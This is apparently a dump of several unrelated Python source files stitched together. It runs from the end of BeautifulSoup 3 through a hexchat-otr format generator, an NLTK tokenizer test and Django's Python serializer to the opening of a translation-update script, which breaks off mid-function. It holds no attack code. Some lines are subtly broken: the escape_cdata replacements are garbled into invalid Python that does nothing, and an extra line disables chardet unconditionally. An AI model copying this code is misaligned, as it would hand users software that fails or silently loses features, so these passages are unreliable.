if self.convertEntities in [self.HTML_ENTITIES,
self.XML_ENTITIES]:
data = unichr(int(ref))
else:
data = '&#%s;' % ref
self.handle_data(data)
def handle_entityref(self, ref):
"""Handle entity references as data, possibly converting known
HTML entity references to the corresponding Unicode
characters."""
data = None
if self.convertEntities == self.HTML_ENTITIES or \
(self.convertEntities == self.XML_ENTITIES and \
self.XML_ENTITY_LIST.get(ref)):
try:
data = unichr(name2codepoint[ref])
except KeyError:
pass
if not data:
data = '&%s;' % ref
self.handle_data(data)
def handle_decl(self, data):
"Handle DOCTYPEs and the like as Declaration objects."
self._toStringSubclass(data, Declaration)
def parse_declaration(self, i):
"""Treat a bogus SGML declaration as raw data. Treat a CDATA
declaration as a CData object."""
j = None
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
k = len(self.rawdata)
data = self.rawdata[i+9:k]
j = k+3
self._toStringSubclass(data, CData)
else:
try:
j = SGMLParser.parse_declaration(self, i)
except SGMLParseError:
toHandle = self.rawdata[i:]
self.handle_data(toHandle)
j = i + len(toHandle)
return j
class BeautifulSoup(BeautifulStoneSoup):
"""This parser knows the following facts about HTML:
* Some tags have no closing tag and should be interpreted as being
closed as soon as they are encountered.
* The text inside some tags (ie. 'script') may contain tags which
are not really part of the document and which should be parsed
as text, not tags. If you want to parse the text as tags, you can
always fetch it and parse it explicitly.
* Tag nesting rules:
Most tags can't be nested at all. For instance, the occurrence of
a <p> tag should implicitly close the previous <p> tag.
<p>Para1<p>Para2
should be transformed into:
<p>Para1</p><p>Para2
Some tags can be nested arbitrarily. For instance, the occurrence
of a <blockquote> tag should _not_ implicitly close the previous
<blockquote> tag.
Alice said: <blockquote>Bob said: <blockquote>Blah
should NOT be transformed into:
Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
Some tags can be nested, but the nesting is reset by the
interposition of other tags. For instance, a <tr> tag should
implicitly close the previous <tr> tag within the same <table>,
but not close a <tr> tag in another table.
<table><tr>Blah<tr>Blah
should be transformed into:
<table><tr>Blah</tr><tr>Blah
but,
<tr>Blah<table><tr>Blah
should NOT be transformed into
<tr>Blah<table></tr><tr>Blah
Differing assumptions about tag nesting rules are a major source
of problems with the BeautifulSoup class. If BeautifulSoup is not
treating as nestable a tag your page author treats as nestable,
try ICantBelieveItsBeautifulSoup, MinimalSoup, or
BeautifulStoneSoup before writing your own subclass."""
def __init__(self, *args, **kwargs):
if not kwargs.has_key('smartQuotesTo'):
kwargs['smartQuotesTo'] = self.HTML_ENTITIES
BeautifulStoneSoup.__init__(self, *args, **kwargs)
SELF_CLOSING_TAGS = buildTagMap(None,
['br' , 'hr', 'input', 'img', 'meta',
'spacer', 'link', 'frame', 'base'])
QUOTE_TAGS = {'script': None}
#According to the HTML standard, each of these inline tags can
#contain another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
'center']
#According to the HTML standard, these block tags can contain
#another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']
#Lists can contain other lists, but there are restrictions.
NESTABLE_LIST_TAGS = { 'ol' : [],
'ul' : [],
'li' : ['ul', 'ol'],
'dl' : [],
'dd' : ['dl'],
'dt' : ['dl'] }
#Tables can contain other tables, but there are restrictions.
NESTABLE_TABLE_TAGS = {'table' : [],
'tr' : ['table', 'tbody', 'tfoot', 'thead'],
'td' : ['tr'],
'th' : ['tr'],
'thead' : ['table'],
'tbody' : ['table'],
'tfoot' : ['table'],
}
NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']
#If one of these tags is encountered, all tags up to the next tag of
#this type are popped.
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
NON_NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS,
NESTABLE_TABLE_TAGS)
NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
# Used to detect the charset in a META tag; see start_meta
CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)")
def start_meta(self, attrs):
"""Beautiful Soup can detect a charset included in a META tag,
try to convert the document to that charset, and re-parse the
document from the beginning."""
httpEquiv = None
contentType = None
contentTypeIndex = None
tagNeedsEncodingSubstitution = False
for i in range(0, len(attrs)):
key, value = attrs[i]
key = key.lower()
if key == 'http-equiv':
httpEquiv = value
elif key == 'content':
contentType = value
contentTypeIndex = i
if httpEquiv and contentType: # It's an interesting meta tag.
match = self.CHARSET_RE.search(contentType)
if match:
if getattr(self, 'declaredHTMLEncoding') or \
(self.originalEncoding == self.fromEncoding):
# This is our second pass through the document, or
# else an encoding was specified explicitly and it
# worked. Rewrite the meta tag.
newAttr = self.CHARSET_RE.sub\
(lambda(match):match.group(1) +
"%SOUP-ENCODING%", value)
attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
newAttr)
tagNeedsEncodingSubstitution = True
else:
# This is our first pass through the document.
# Go through it again with the new information.
newCharset = match.group(3)
if newCharset and newCharset != self.originalEncoding:
self.declaredHTMLEncoding = newCharset
self._feed(self.declaredHTMLEncoding)
raise StopParsing
tag = self.unknown_starttag("meta", attrs)
if tag and tagNeedsEncodingSubstitution:
tag.containsSubstitutions = True
class StopParsing(Exception):
pass
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
"""The BeautifulSoup class is oriented towards skipping over
common HTML errors like unclosed tags. However, sometimes it makes
errors of its own. For instance, consider this fragment:
<b>Foo<b>Bar</b></b>
This is perfectly valid (if bizarre) HTML. However, the
BeautifulSoup class will implicitly close the first b tag when it
encounters the second 'b'. It will think the author wrote
"<b>Foo<b>Bar", and didn't close the first 'b' tag, because
there's no real-world reason to bold something that's already
bold. When it encounters '</b></b>' it will close two more 'b'
tags, for a grand total of three tags closed instead of two. This
can throw off the rest of your document structure. The same is
true of a number of other tags, listed below.
It's much more common for someone to forget to close a 'b' tag
than to actually use nested 'b' tags, and the BeautifulSoup class
handles the common case. This class handles the not-so-common
case: where you can't believe someone wrote what they did, but
it's valid HTML and BeautifulSoup screwed up by assuming it
wouldn't be."""
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
'big']
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']
NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class MinimalSoup(BeautifulSoup):
"""The MinimalSoup class is for parsing HTML that contains
pathologically bad markup. It makes no assumptions about tag
nesting, but it does know which tags are self-closing, that
<script> tags contain Javascript and should not be parsed, that
META tags may contain encoding information, and so on.
This also makes it better for subclassing than BeautifulStoneSoup
or BeautifulSoup."""
RESET_NESTING_TAGS = buildTagMap('noscript')
NESTABLE_TAGS = {}
class BeautifulSOAP(BeautifulStoneSoup):
"""This class will push a tag with only a single string child into
the tag's parent as an attribute. The attribute's name is the tag
name, and the value is the string child. An example should give
the flavor of the change:
<foo><bar>baz</bar></foo>
=>
<foo bar="baz"><bar>baz</bar></foo>
You can then access fooTag['bar'] instead of fooTag.barTag.string.
This is, of course, useful for scraping structures that tend to
use subelements instead of attributes, such as SOAP messages. Note
that it modifies its input, so don't print the modified version
out.
I'm not sure how many people really want to use this class; let me
know if you do. Mainly I like the name."""
def popTag(self):
if len(self.tagStack) > 1:
tag = self.tagStack[-1]
parent = self.tagStack[-2]
parent._getAttrMap()
if (isinstance(tag, Tag) and len(tag.contents) == 1 and
isinstance(tag.contents[0], NavigableString) and
not parent.attrMap.has_key(tag.name)):
parent[tag.name] = tag.contents[0]
BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisness,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
pass
class RobustHTMLParser(BeautifulSoup):
pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
pass
class RobustInsanelyWackAssHTMLParser(MinimalSoup):
pass
class SimplifyingSOAPParser(BeautifulSOAP):
pass
######################################################
#
# Bonus library: Unicode, Dammit
#
# This class forces XML data into a standard format (usually to UTF-8
# or Unicode). It is heavily based on code from Mark Pilgrim's
# Universal Feed Parser. It does not rewrite the XML or HTML to
# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
# (XML) and BeautifulSoup.start_meta (HTML).
# Autodetects character encodings.
# Download from http://chardet.feedparser.org/
try:
import chardet
# import chardet.constants
# chardet.constants._debug = 1
except:
chardet = None
# Note that this line unconditionally disables chardet, even when the
# import above succeeded.
chardet = None
# cjkcodecs and iconv_codec make Python know about more character encodings.
# Both are available from http://cjkpython.i18n.org/
# They're built in if you use Python 2.4.
try:
import cjkcodecs.aliases
except:
pass
try:
import iconv_codec
except:
pass
class UnicodeDammit:
"""A class for detecting the encoding of a *ML document and
converting it to a Unicode string. If the source encoding is
windows-1252, can replace MS smart quotes with their HTML or XML
equivalents."""
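# A hedged usage sketch (variable names are illustrative): UnicodeDammit
# can also be used on its own, outside the soup classes:
#   converted = UnicodeDammit(raw_bytes, overrideEncodings=["iso-8859-2"])
#   converted.unicode            # the document as a Unicode string, or None
#   converted.originalEncoding   # the encoding that was actually used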
# This dictionary maps commonly seen values for "charset" in HTML
# meta tags to the corresponding Python codec names. It only covers
# values that aren't in Python's aliases and can't be determined
# by the heuristics in find_codec.
CHARSET_ALIASES = { "macintosh" : "mac-roman",
"x-sjis" : "shift-jis" }
def __init__(self, markup, overrideEncodings=[],
smartQuotesTo='xml'):
self.markup, documentEncoding, sniffedEncoding = \
self._detectEncoding(markup)
self.smartQuotesTo = smartQuotesTo
self.triedEncodings = []
if markup == '' or isinstance(markup, unicode):
self.originalEncoding = None
self.unicode = unicode(markup)
return
u = None
for proposedEncoding in overrideEncodings:
u = self._convertFrom(proposedEncoding)
if u: break
if not u:
for proposedEncoding in (documentEncoding, sniffedEncoding):
u = self._convertFrom(proposedEncoding)
if u: break
# If no luck and we have auto-detection library, try that:
if not u and chardet and not isinstance(self.markup, unicode):
u = self._convertFrom(chardet.detect(self.markup)['encoding'])
# As a last resort, try utf-8 and windows-1252:
if not u:
for proposed_encoding in ("utf-8", "windows-1252"):
u = self._convertFrom(proposed_encoding)
if u: break
self.unicode = u
if not u: self.originalEncoding = None
def _subMSChar(self, orig):
"""Changes a MS smart quote character to an XML or HTML
entity."""
sub = self.MS_CHARS.get(orig)
if type(sub) == types.TupleType:
if self.smartQuotesTo == 'xml':
sub = '&#x%s;' % sub[1]
else:
sub = '&%s;' % sub[0]
return sub
def _convertFrom(self, proposed):
proposed = self.find_codec(proposed)
if not proposed or proposed in self.triedEncodings:
return None
self.triedEncodings.append(proposed)
markup = self.markup
# Convert smart quotes to HTML if coming from an encoding
# that might have them.
if self.smartQuotesTo and proposed.lower() in("windows-1252",
"iso-8859-1",
"iso-8859-2"):
markup = re.compile("([\x80-\x9f])").sub \
(lambda(x): self._subMSChar(x.group(1)),
markup)
try:
# print "Trying to convert document to %s" % proposed
u = self._toUnicode(markup, proposed)
self.markup = u
self.originalEncoding = proposed
except Exception, e:
# print "That didn't work!"
# print e
return None
#print "Correct encoding: %s" % proposed
return self.markup
def _toUnicode(self, data, encoding):
'''Given a string and its encoding, decodes the string into Unicode.
%encoding is a string recognized by encodings.aliases'''
# strip Byte Order Mark (if present)
if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16be'
data = data[2:]
elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16le'
data = data[2:]
elif data[:3] == '\xef\xbb\xbf':
encoding = 'utf-8'
data = data[3:]
elif data[:4] == '\x00\x00\xfe\xff':
encoding = 'utf-32be'
data = data[4:]
elif data[:4] == '\xff\xfe\x00\x00':
encoding = 'utf-32le'
data = data[4:]
newdata = unicode(data, encoding)
return newdata
def _detectEncoding(self, xml_data):
"""Given a document, tries to detect its XML encoding."""
xml_encoding = sniffed_xml_encoding = None
try:
if xml_data[:4] == '\x4c\x6f\xa7\x94':
# EBCDIC
xml_data = self._ebcdic_to_ascii(xml_data)
elif xml_data[:4] == '\x00\x3c\x00\x3f':
# UTF-16BE
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
and (xml_data[2:4] != '\x00\x00'):
# UTF-16BE with BOM
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x3f\x00':
# UTF-16LE
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
(xml_data[2:4] != '\x00\x00'):
# UTF-16LE with BOM
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\x00\x3c':
# UTF-32BE
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x00\x00':
# UTF-32LE
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\xfe\xff':
# UTF-32BE with BOM
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\xff\xfe\x00\x00':
# UTF-32LE with BOM
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
elif xml_data[:3] == '\xef\xbb\xbf':
# UTF-8 with BOM
sniffed_xml_encoding = 'utf-8'
xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
else:
sniffed_xml_encoding = 'ascii'
pass
xml_encoding_match = re.compile \
('^<\?.*encoding=[\'"](.*?)[\'"].*\?>')\
.match(xml_data)
except:
xml_encoding_match = None
if xml_encoding_match:
xml_encoding = xml_encoding_match.groups()[0].lower()
if sniffed_xml_encoding and \
(xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
'iso-10646-ucs-4', 'ucs-4', 'csucs4',
'utf-16', 'utf-32', 'utf_16', 'utf_32',
'utf16', 'u16')):
xml_encoding = sniffed_xml_encoding
return xml_data, xml_encoding, sniffed_xml_encoding
def find_codec(self, charset):
return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
or (charset and self._codec(charset.replace("-", ""))) \
or (charset and self._codec(charset.replace("-", "_"))) \
or charset
def _codec(self, charset):
if not charset: return charset
codec = None
try:
codecs.lookup(charset)
codec = charset
except LookupError:
pass
return codec
EBCDIC_TO_ASCII_MAP = None
def _ebcdic_to_ascii(self, s):
c = self.__class__
if not c.EBCDIC_TO_ASCII_MAP:
emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
201,202,106,107,108,109,110,111,112,113,114,203,204,205,
206,207,208,209,126,115,116,117,118,119,120,121,122,210,
211,212,213,214,215,216,217,218,219,220,221,222,223,224,
225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
250,251,252,253,254,255)
import string
c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
''.join(map(chr, range(256))), ''.join(map(chr, emap)))
return s.translate(c.EBCDIC_TO_ASCII_MAP)
MS_CHARS = { '\x80' : ('euro', '20AC'),
'\x81' : ' ',
'\x82' : ('sbquo', '201A'),
'\x83' : ('fnof', '192'),
'\x84' : ('bdquo', '201E'),
'\x85' : ('hellip', '2026'),
'\x86' : ('dagger', '2020'),
'\x87' : ('Dagger', '2021'),
'\x88' : ('circ', '2C6'),
'\x89' : ('permil', '2030'),
'\x8A' : ('Scaron', '160'),
'\x8B' : ('lsaquo', '2039'),
'\x8C' : ('OElig', '152'),
'\x8D' : '?',
'\x8E' : ('#x17D', '17D'),
'\x8F' : '?',
'\x90' : '?',
'\x91' : ('lsquo', '2018'),
'\x92' : ('rsquo', '2019'),
'\x93' : ('ldquo', '201C'),
'\x94' : ('rdquo', '201D'),
'\x95' : ('bull', '2022'),
'\x96' : ('ndash', '2013'),
'\x97' : ('mdash', '2014'),
'\x98' : ('tilde', '2DC'),
'\x99' : ('trade', '2122'),
'\x9a' : ('scaron', '161'),
'\x9b' : ('rsaquo', '203A'),
'\x9c' : ('oelig', '153'),
'\x9d' : '?',
'\x9e' : ('#x17E', '17E'),
'\x9f' : ('Yuml', ''),}
#######################################################################
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin.read())
print soup.prettify()
|
TingPing/hexchat-otr
|
refs/heads/master
|
src/makeformats.py
|
1
|
#!/usr/bin/env python3
#
# Uli Meis <a.sporto+bee@gmail.com>
#
# Just a short script to generate our FORMAT_REC
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,USA
import sys,os,re
GPL_LICENSE = """
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,USA
*/
"""
lines = map(lambda x: x.strip(),open(sys.argv[1],"r").readlines())
out_dir = sys.argv[2] if len(sys.argv) > 2 else "."
hdr = open(os.path.join(out_dir, "otr-formats.h"), "w")
srcx = open(os.path.join(out_dir, "hexchat-formats.c"), "w")
srcx.write(GPL_LICENSE)
hdr.write(GPL_LICENSE)
srcx.write('#include "otr.h"\n')
srcx.write('FORMAT_REC formats[] = {\n\t')
srcx.write('{ MODULE_NAME, "otr" }')
hdr.write("enum\n{\n\t")
hdr.write("TXT_OTR_MODULE_NAME")
fills = 0
section = None
for line in lines:
srcx.write(",\n\t")
e = line.split("\t")
if len(e)==1:
# Section name
section = e[0]
srcx.write("""{ NULL, "%s" }""" % (e[0]))
hdr.write(",\n\tTXT_OTR_FILL_%d" % fills)
fills += 1
continue
params = []
fo = e[1]
new = ""
last=0
i=0
srcx.write("""{ "%s", "%s" """ % (e[0],fo.replace("%%9","").replace("%9","").replace("%g","").replace("%n","")))
for m in re.finditer("(^|[^%])%([0-9]*)[ds]",fo):
if m.group()[-1]=='d':
params += ['1']
else:
params += ['0']
new += fo[last:m.start()+len(m.group(1))].replace('%%','%')+"$"
if m.group(2): new+= "[%s]" % m.group(2)
new += "%d" % i
last = m.end()
i += 1
new += fo[last:].replace('%%','%')
e[1] = new
e += [len(params)] + params
#print "Handling line %s with elen %d" % (line,len(e))
premsg = ""
if e[1][0] != "{" and section!="Nickignore" and section!="Contexts":
premsg = "%9OTR%9: "
srcx.write("}")
hdr.write(",\n\t")
hdr.write("TXT_%s" % e[0].upper())
hdr.write("""
};
extern FORMAT_REC formats[];
""")
srcx.write(""",
\t{ NULL, NULL }
};
G_STATIC_ASSERT (G_N_ELEMENTS(formats) - 1 == TXT_ST_UNKNOWN + 1);
""")
hdr.close()
srcx.close()
|
boompieman/iim_project
|
refs/heads/master
|
project_python2/lib/python2.7/site-packages/nltk/test/unit/test_tokenize.py
|
4
|
# -*- coding: utf-8 -*-
"""
Unit tests for nltk.tokenize.
See also nltk/test/tokenize.doctest
"""
from __future__ import unicode_literals
from nltk.tokenize import TweetTokenizer
import unittest
class TestTokenize(unittest.TestCase):
def test_tweet_tokenizer(self):
"""
Test TweetTokenizer using words with special and accented characters.
"""
tokenizer = TweetTokenizer(strip_handles=True, reduce_len=True)
s9 = "@myke: Let's test these words: resumé España München français"
tokens = tokenizer.tokenize(s9)
expected = [':', "Let's", 'test', 'these', 'words', ':', 'resumé',
'España', 'München', 'français']
self.assertEqual(tokens, expected)
|
Serag8/Bachelor
|
refs/heads/master
|
google_appengine/lib/django-1.2/django/core/serializers/python.py
|
223
|
"""
A Python "serializer". Doesn't do much serializing per se -- just converts to
and from basic Python data types (lists, dicts, strings, etc.). Useful as a basis for
other serializers.
"""
from django.conf import settings
from django.core.serializers import base
from django.db import models, DEFAULT_DB_ALIAS
from django.utils.encoding import smart_unicode, is_protected_type
class Serializer(base.Serializer):
"""
Serializes a QuerySet to basic Python objects.
"""
internal_use_only = True
def start_serialization(self):
self._current = None
self.objects = []
def end_serialization(self):
pass
def start_object(self, obj):
self._current = {}
def end_object(self, obj):
self.objects.append({
"model" : smart_unicode(obj._meta),
"pk" : smart_unicode(obj._get_pk_val(), strings_only=True),
"fields" : self._current
})
self._current = None
def handle_field(self, obj, field):
value = field._get_val_from_obj(obj)
# Protected types (i.e., primitives like None, numbers, dates,
# and Decimals) are passed through as is. All other values are
# converted to string first.
if is_protected_type(value):
self._current[field.name] = value
else:
self._current[field.name] = field.value_to_string(obj)
def handle_fk_field(self, obj, field):
related = getattr(obj, field.name)
if related is not None:
if self.use_natural_keys and hasattr(related, 'natural_key'):
related = related.natural_key()
else:
if field.rel.field_name == related._meta.pk.name:
# Related to remote object via primary key
related = related._get_pk_val()
else:
# Related to remote object via other field
related = smart_unicode(getattr(related, field.rel.field_name), strings_only=True)
self._current[field.name] = related
def handle_m2m_field(self, obj, field):
if field.rel.through._meta.auto_created:
if self.use_natural_keys and hasattr(field.rel.to, 'natural_key'):
m2m_value = lambda value: value.natural_key()
else:
m2m_value = lambda value: smart_unicode(value._get_pk_val(), strings_only=True)
self._current[field.name] = [m2m_value(related)
for related in getattr(obj, field.name).iterator()]
def getvalue(self):
return self.objects
def Deserializer(object_list, **options):
"""
Deserialize simple Python objects back into Django ORM instances.
It's expected that you pass the Python objects themselves (instead of a
stream or a string) to the constructor.
"""
db = options.pop('using', DEFAULT_DB_ALIAS)
models.get_apps()
for d in object_list:
# Look up the model and start building a dict of data for it.
Model = _get_model(d["model"])
data = {Model._meta.pk.attname : Model._meta.pk.to_python(d["pk"])}
m2m_data = {}
# Handle each field
for (field_name, field_value) in d["fields"].iteritems():
if isinstance(field_value, str):
field_value = smart_unicode(field_value, options.get("encoding", settings.DEFAULT_CHARSET), strings_only=True)
field = Model._meta.get_field(field_name)
# Handle M2M relations
if field.rel and isinstance(field.rel, models.ManyToManyRel):
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
def m2m_convert(value):
if hasattr(value, '__iter__'):
return field.rel.to._default_manager.db_manager(db).get_by_natural_key(*value).pk
else:
return smart_unicode(field.rel.to._meta.pk.to_python(value))
else:
m2m_convert = lambda v: smart_unicode(field.rel.to._meta.pk.to_python(v))
m2m_data[field.name] = [m2m_convert(pk) for pk in field_value]
# Handle FK fields
elif field.rel and isinstance(field.rel, models.ManyToOneRel):
if field_value is not None:
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
if hasattr(field_value, '__iter__'):
obj = field.rel.to._default_manager.db_manager(db).get_by_natural_key(*field_value)
value = getattr(obj, field.rel.field_name)
# If this is a natural foreign key to an object that
# has a FK/O2O as the foreign key, use the FK value
if field.rel.to._meta.pk.rel:
value = value.pk
else:
value = field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
data[field.attname] = value
else:
data[field.attname] = field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
else:
data[field.attname] = None
# Handle all other fields
else:
data[field.name] = field.to_python(field_value)
yield base.DeserializedObject(Model(**data), m2m_data)
def _get_model(model_identifier):
"""
Helper to look up a model from an "app_label.module_name" string.
"""
try:
Model = models.get_model(*model_identifier.split("."))
except TypeError:
Model = None
if Model is None:
raise base.DeserializationError(u"Invalid model identifier: '%s'" % model_identifier)
return Model
|
moneta-project/moneta-2.0.1.0
|
refs/heads/master
|
contrib/devtools/update-translations.py
|
5
|
#!/usr/bin/python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
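# Typical invocation, for illustration (run from the repository root, with the
# transifex client installed and configured):
#   python contrib/devtools/update-translations.py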
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'moneta_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
specifiers.append(s[percent+1])
pos = percent+2
return specifiers
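# For example (illustrative strings, not taken from the translation files):
#   find_format_specifiers('%1 of %2 blocks')      -> ['1', '2']   (Qt style)
#   find_format_specifiers('Copied %s (%d bytes)') -> ['s', 'd']   (strprintf style)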
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
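# e.g. split_format_specifiers(['1', '2']) -> ({'1', '2'}, [])
#      split_format_specifiers(['s', 'd']) -> (set(), ['s', 'd'])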
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation '%s'" % sanitize_string(translation))
return False
else:
if source_f != translation_f:
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
# Override the cdata escape function to make our output match Qt's (optional, just for cleaner diffs
# when comparing; disabled by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
parser = ET.XMLParser(encoding='utf-8') # override the encoding: the parser understands 'utf-8' but not 'utf8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
